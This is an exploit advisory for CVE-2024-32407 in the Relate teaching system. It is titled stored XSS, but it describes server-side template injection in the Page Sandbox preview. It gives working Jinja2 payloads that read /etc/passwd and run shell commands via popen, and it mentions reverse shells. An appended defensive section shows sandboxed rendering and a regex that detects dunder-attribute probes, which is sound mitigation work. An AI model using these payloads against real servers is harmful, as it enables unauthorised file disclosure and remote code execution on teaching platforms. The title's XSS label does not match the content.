# Exploit Title: Relate Learning And Teaching system Version before 2024.1 Stored XSS
# Date: 18/04/2024
# Exploit Author: kai6u
# Vendor Homepage: https://github.com/inducer/
# Software Link: https://github.com/inducer/relate
# Version: 2024.1 (https://github.com/inducer/relate/commit/2fdbd4480a2d0a45c746639be244a61a0d4112b6)
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-32407(Reserved)

* The SSTI is in the Page Sandbox feature, which allows users to check flow pages before publishing them.

1) The attacker uses the Page Sandbox feature to plant the following payload.

* Payload:
* {{ 'abc'.__class__.__base__.__subclasses__()[111].__subclasses__()[0].__subclasses__()[0]('/etc/passwd').read() }}

* Note that the subclasses index number in the payload depends on the Python version, so it must be changed to match the environment.

2) Click Preview with the above payload included.

* You will then see the contents of the `/etc/passwd` file output in the Content Preview block.

3) Next, the attacker modifies the above payload to execute arbitrary commands by changing the subclasses index number to the index of popen.

* Payload:
* {{ 'abc'.__class__.__base__.__subclasses__()[210]('whoami',shell=True,stdout=-1).communicate()[0].strip() }}

4) Click Preview with the above payload included.

* If you check the result, you will see that `ubuntu` is displayed, which is the output of the whoami command.
* An attacker can use this feature to execute a reverse shell.
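The root cause described above is that user-supplied page source is rendered by an unrestricted template engine, so a string literal's `__class__` chain reaches `object` and, from there, arbitrary Python. The following is an added example written for this page, not code from the advisory or from the relate project: it renders untrusted page source in Jinja2's `SandboxedEnvironment`, which refuses dunder-attribute access and raises `SecurityError` on payloads of the shape shown above, and pairs it with a simple regex pre-screen suitable for logging or alerting. The function names (`render_preview`, `is_blocked`, `looks_like_sandbox_escape`) and the benign sample template are assumptions for illustration.

```python
# Added example (not part of the advisory or the relate project): render
# untrusted page source in Jinja2's sandbox so that dunder-attribute chains
# such as 'abc'.__class__.__base__ are refused, and pre-screen submissions
# for the same pattern so they can be logged. Function names are hypothetical.
import re
from typing import Optional

from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Attribute or subscript access spelled with leading and trailing double
# underscores is a reliable signal that page source is probing object internals.
_DUNDER_ACCESS = re.compile(r"(?:\.|\[\s*['\"])__\w+__")


def looks_like_sandbox_escape(source: str) -> bool:
    """Pre-screen for logging: True if the source reaches for __dunder__ members."""
    return _DUNDER_ACCESS.search(source) is not None


# One sandboxed environment for all previews. autoescape also keeps a rendered
# preview from injecting raw markup back into the page that displays it.
_SANDBOX = SandboxedEnvironment(autoescape=True)


def render_preview(source: str, context: Optional[dict] = None) -> str:
    """Render untrusted page source; raises SecurityError on unsafe access."""
    template = _SANDBOX.from_string(source)
    return template.render(**(context or {}))


def is_blocked(source: str, context: Optional[dict] = None) -> bool:
    """True if the sandbox refuses to render the given source."""
    try:
        render_preview(source, context)
    except SecurityError:
        return True
    return False


if __name__ == "__main__":
    benign = "Hello {{ name }}"                      # constructed sample page
    probe = "{{ 'abc'.__class__.__base__ }}"        # shape of the advisory's payload
    print(render_preview(benign, {"name": "student"}))
    print("pre-screen flags probe:", looks_like_sandbox_escape(probe))
    print("sandbox blocks probe:", is_blocked(probe))
```

The sandbox is the actual control; the regex is only a detection hook, since attribute access can also be spelled through filters such as `attr()`, which the regex does not see but the sandbox still refuses. Note that `{{ 'abc'.__class__ }}` on its own renders as an empty string rather than raising, because the sandbox substitutes an `Undefined` for the unsafe attribute; the error is raised as soon as that `Undefined` is dereferenced or called, which every usable payload of this kind must do.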
References:
https://book.hacktricks.xyz/v/jp/pentesting-web/ssti-server-side-template-injection